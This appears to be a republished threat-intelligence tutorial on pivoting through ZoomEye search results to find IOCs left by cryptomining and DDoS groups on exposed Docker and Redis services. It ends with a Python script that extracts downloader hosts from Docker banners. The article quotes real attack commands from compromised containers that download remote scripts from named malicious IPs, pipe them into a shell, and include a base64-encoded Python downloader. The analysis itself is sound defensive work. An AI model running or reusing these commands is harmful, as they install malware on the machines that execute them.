How to get IOC in ZoomEye

2025-02-01 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

This article shows how to pull IOCs out of ZoomEye search results. The content is fairly detailed; interested readers can use it for reference, and I hope it is helpful.

Recently, while using ZoomEye to look up some malicious IOC IP addresses, I came across a malicious IP, 194.38.20.199, that is still active. I queried it directly in ZoomEye with:

194.38.20.199 -ip:194.38.20.199

Explanation: the bare IP on the left is a global string match across all indexed banners, and the -ip:194.38.20.199 on the right excludes the results for the ports and services opened on that IP itself, leaving only the hosts whose banners merely contain the string. The result: 129 hits, mostly redis and docker services. These are the traces this group left behind on its victims, captured by ZoomEye. The redis records show that the attack was carried out by setting master_host on the victim (replication-based RCE; see https://paper.seebug.org/975/). The docker services expose container information through the Docker API, and the image's Command field is set to execute the following:

/bin/bash -c 'apt-get update && apt-get install -y wget cron; service cron start; wget -q -O- 194.38.20.199/d.sh | sh; tail -f /dev/null'

Visiting the IP confirms that the service is still alive. In many cases, automated attacks such as botnets leave behind a lot of attack traces, and cyberspace search engines can capture them; see for example https://paper.seebug.org/595/, or the new Matryosh botnet recently reported by 360netlab, which spreads by attacking adb services. A foreign researcher found that interesting information about it can be pulled from ZoomEye: https://twitter.com/r3dbU7z/status/1356802656493264896. Back to the case at hand. Among these compromised Docker API services, we can search ZoomEye for traces such as wget, curl or apt-get in order to identify the intrusion targets, other attacker groups and further IOC information. Taking wget as the example, the search syntax is as follows:

"Server: Docker" + "Content-Type: application/json" + wget

So far this returns 71 results (note that the count can change at any time, because ZoomEye updates by overwriting: if the service is restored to normal after the intrusion, the old banner is replaced by the new scan result). To look for other groups or IOCs, exclude the IP we already know:

"Server: Docker" + "Content-Type: application/json" + wget -194.38.20.199

Excluding the targets that contain 194.38.20.199 leaves 19 results. Picking one at random:

"Command": "sh -c 'wget -qO- http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null'"

This yields a new IP, 34.66.229.152 [also alive]; open-source threat intelligence attributes it to the Tsunami DDoS gang. Let's continue with the syntax:

"Server: Docker" + "Content-Type: application/json" + wget -194.38.20.199 -34.66.229.152

This returns 2 targets. Looking at the Command field in their banners gives 2 more malicious IPs: 45.137.155.55 [also alive] and 209.141.40.190 [also alive].

"Command": "/bin/bash -c 'apt-get update && apt-get install -y wget cron; service cron start; wget -q -O- 45.137.155.55/d.sh | sh; tail -f /dev/null'"

The command format and the d.sh script name closely match 194.38.20.199, so this one can tentatively be attributed to Kinsing as well.

"Command": "chroot /mnt /bin/sh -c 'curl -s http://209.141.40.190/xms | bash -sh; wget -q -O- http://209.141.40.190/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms'"

This looks like another mining-related payload. Note the base64 blob: it decodes to python -c 'import urllib;exec(urllib.urlopen("http://209.141.40.190/d.py").read())', a second-stage downloader that pulls d.py from the same host, so the banner hides one more URL than is visible at first glance. So, just by searching for wget in the Docker API information, we have found the following malicious IOCs:

194.38.20.199 Kinsing / mining
45.137.155.55 Kinsing / mining
34.66.229.152 Tsunami / DDoS
209.141.40.190 unknown / mining

Of course, one could also fetch and analyze the sh scripts involved to correlate more IOC IP addresses, but that is beyond the topic here and is not pursued further.
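To make the pivot above repeatable, here is an added example (my own code, not from the article, from ZoomEye, or from any of the malware families named) that parses Docker API banners of the kind shown above, pulls the downloader host out of every container Command, decodes embedded echo ... | base64 -d stages so hidden URLs such as the d.py above are not missed, and builds the next exclusion query. The banners are constructed samples modelled on the commands quoted in the article; no ZoomEye API calls are made, so it runs offline.

```python
import base64
import binascii
import json
import re
from typing import Dict, Iterable, List, Set

# The search the article starts from; each round appends -<ip> exclusions to it.
BASE_QUERY = '"Server: Docker" + "Content-Type: application/json" + wget'
DOWNLOADERS = ("wget", "curl", "lwp-download")

# IPv4 host with optional scheme, port and path (wget accepts a bare "1.2.3.4/d.sh").
URL_RE = re.compile(r"""(?:https?://)?(\d{1,3}(?:\.\d{1,3}){3})(?::\d{1,5})?(/[^\s'"|;]*)?""")
# The "echo <base64> | base64 -d" stager seen in the last Command in the article.
B64_STAGE_RE = re.compile(r"echo\s+([A-Za-z0-9+/=]{16,})\s*\|\s*base64\s+(?:-d|--decode)")

# Constructed sample banners: bodies of Docker API GET /containers/json responses,
# with the Command strings taken from the article, plus one benign container and
# one non-JSON banner (a ZoomEye result set is never entirely clean).
SAMPLE_BANNERS = [
    json.dumps([{"Id": "a1", "Image": "alpine", "Command":
        "/bin/bash -c 'apt-get update && apt-get install -y wget cron;service cron start; "
        "wget -q -O- 194.38.20.199/d.sh | sh;tail -f /dev/null'"}]),
    json.dumps([{"Id": "b2", "Image": "ubuntu", "Command":
        "sh -c 'wget -qO- http://34.66.229.152:80/wp-content/themes/twentyseventeen/d | sh; tail -f /dev/null'"}]),
    json.dumps([{"Id": "c3", "Image": "alpine", "Command":
        "chroot /mnt /bin/sh -c 'curl -s http://209.141.40.190/xms | bash -sh; "
        "echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDkuMTQxLjQwLjE5MC9kLnB5IikucmVhZCgpKSc= "
        "| base64 -d | bash -; lwp-download http://209.141.40.190/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms'"}]),
    json.dumps([{"Id": "d4", "Image": "nginx", "Command": "nginx -g 'daemon off;'"}]),
    "<html>not a docker api response</html>",
]


def decode_base64_stages(command: str) -> List[str]:
    """Return the decoded text of every 'echo <b64> | base64 -d' stage found in a command."""
    decoded = []
    for blob in B64_STAGE_RE.findall(command):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (binascii.Error, ValueError):
            continue  # garbage that only looks like base64: skip it rather than fail the scan
    return decoded


def extract_iocs(command: str) -> Dict[str, Set[str]]:
    """Map each IP a downloader fetches from to the URL paths used, base64 stages included."""
    iocs: Dict[str, Set[str]] = {}
    if not any(tool in command for tool in DOWNLOADERS):
        return iocs  # a plain service command such as nginx carries nothing to pivot on
    for text in [command] + decode_base64_stages(command):
        for ip, path in URL_RE.findall(text):
            iocs.setdefault(ip, set()).add(ip + (path or "/"))
    return iocs


def scan_banner(banner: str) -> Dict[str, Set[str]]:
    """Parse one Docker /containers/json banner and collect IOCs from every container Command."""
    found: Dict[str, Set[str]] = {}
    try:
        containers = json.loads(banner)
    except json.JSONDecodeError:
        return found  # HTML error pages and other non-JSON banners are simply skipped
    if not isinstance(containers, list):
        return found  # e.g. {"message": "page not found"} from a locked-down daemon
    for container in containers:
        if isinstance(container, dict):
            for ip, urls in extract_iocs(container.get("Command", "")).items():
                found.setdefault(ip, set()).update(urls)
    return found


def pivot(banners: Iterable[str]) -> Dict[str, Set[str]]:
    """Merge the IOCs of a whole result set; its keys feed next_query() for the next round."""
    merged: Dict[str, Set[str]] = {}
    for banner in banners:
        for ip, urls in scan_banner(banner).items():
            merged.setdefault(ip, set()).update(urls)
    return merged


def next_query(base: str, exclude_ips: Iterable[str]) -> str:
    """Build the next ZoomEye query: the base search minus every host already attributed."""
    return base + "".join(f" -{ip}" for ip in sorted(set(exclude_ips)))


if __name__ == "__main__":
    iocs = pivot(SAMPLE_BANNERS)
    for ip in sorted(iocs):
        print(ip, sorted(iocs[ip]))
    print(next_query(BASE_QUERY, iocs))
```

One caveat when driving this loop against live results: a string exclusion such as -194.38.20.199 drops every banner that mentions that IP, including a banner where a second, still unknown host appears next to it, so record the IOCs of each round before excluding anything, and verify each extracted host yourself (the "[also alive]" checks in the article) before treating it as a current indicator.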

That is all on how to get IOCs in ZoomEye. I hope the content above helps you learn something; if you found it useful, please share it so that more people can see it.


© 2024 shulou.com SLNews company. All rights reserved.
